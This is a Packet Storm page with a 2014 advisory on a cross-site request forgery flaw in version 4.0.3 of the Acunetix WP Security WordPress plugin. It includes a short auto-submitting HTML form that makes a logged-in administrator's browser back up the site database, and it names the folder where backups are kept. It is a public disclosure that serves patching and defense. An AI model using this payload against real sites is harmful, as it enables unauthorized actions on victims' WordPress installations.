what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Acunetix WP Security Make Backup 4.0.3 CSRF

WordPress Acunetix WP Security Make Backup 4.0.3 CSRF
Posted Feb 14, 2014
Authored by Yashar shahinzadeh

Acunetix WordPress WP Security Make Backup plugin version 4.0.3 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | b252718580ee023413cc606be9290cfbd4802abfc7c7fe6ae15564dab7317941

WordPress Acunetix WP Security Make Backup 4.0.3 CSRF

Change Mirror Download
###################################################################################################################################
# Exploit Title: Wordpress Plugin - Acunetix WP Security Make Backup CSRF
# Date: 2014 11 Fabruary
# Exploit Author: Yashar shahinzadeh
# Special thanks to Mormoroth
# Credit goes for: http://y-shahinzadeh.ir & ha.cker.ir
# Vendor Homepage: http://wordpress.org/plugins/wp-security-scan/
# Tested on: Linux & Windows, PHP 5.3.2
# Affected Version : 4.0.3 (Last)
#
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir }
###################################################################################################################################

Summary:
========
1. CSRF / Get Backup
2. Further Information

1. CSRF / Get Backup:
=====================
The Acunetix WP Security Suffers from CSRF attack, getting backup of wordpress database and saving it in backup folder. Although it has a good random generator function producing
none-guessable numeric values, it still is a vulnerability which can be used against wordpress in a complex attack scenario. Here is a simple exploit:

<html>
<body onload="submitForm()">
<form name="myForm" id="myForm" action="http://localhost/wordpress-3.8/wp-admin/admin.php?page=wps_database" method="post">
<input type="hidden" name="wsd_db_backup" value="">
<input type="hidden" name="backupDatabaseButton" value="Backup+now%21">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>

Backup files are stored in /wp-content/plugins/wp-security-scan/res/backups/ directory. It's protected with an index, though.

2. Further Information:
=======================
Further analysis about backup function and attacking against it can be found at my blog, http://blog.y-shahinzadeh.ir

/** Yasshar Shahinzadeh **/
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close